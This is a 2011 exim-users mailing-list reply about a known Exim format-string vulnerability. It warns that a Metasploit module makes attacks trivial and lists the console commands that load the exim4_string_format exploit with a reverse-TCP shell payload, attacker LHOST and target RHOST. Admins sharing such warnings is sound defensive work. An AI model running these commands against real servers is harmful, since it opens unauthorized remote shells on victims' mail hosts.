On 12/01/2011 13:36, Ted Cooper wrote: > There is the possibility that this has become part of some script kiddie > exploit kit now so there may be more of these attacks against servers > running old versions. Luckily it's not very well written and falls over > fairly quickly.
There's a Metasploit module for it as well: http://www.metasploit.com/modules/exploit/unix/smtp/exim4_string_format So exploiting it is as simple as: 1. install Metasploit 2. run Metasploit 3. Type: use exploit/unix/smtp/exim4_string_format set payload generic/shell_reverse_tcp set LHOST my.ip set RHOST target.ip exploit -- Mike Cardwell https://secure.grepular.com/ https://twitter.com/mickeyc Professional http://cardwellit.com/ http://linkedin.com/in/mikecardwell PGP.mit.edu 0018461F/35BC AF1D 3AA2 1F84 3DC3 B0CF 70A5 F512 0018 461F -- ## List details at http://lists.exim.org/mailman/listinfo/exim-users ## Exim details at http://www.exim.org/ ## Please use the Wiki with this list - http://wiki.exim.org/
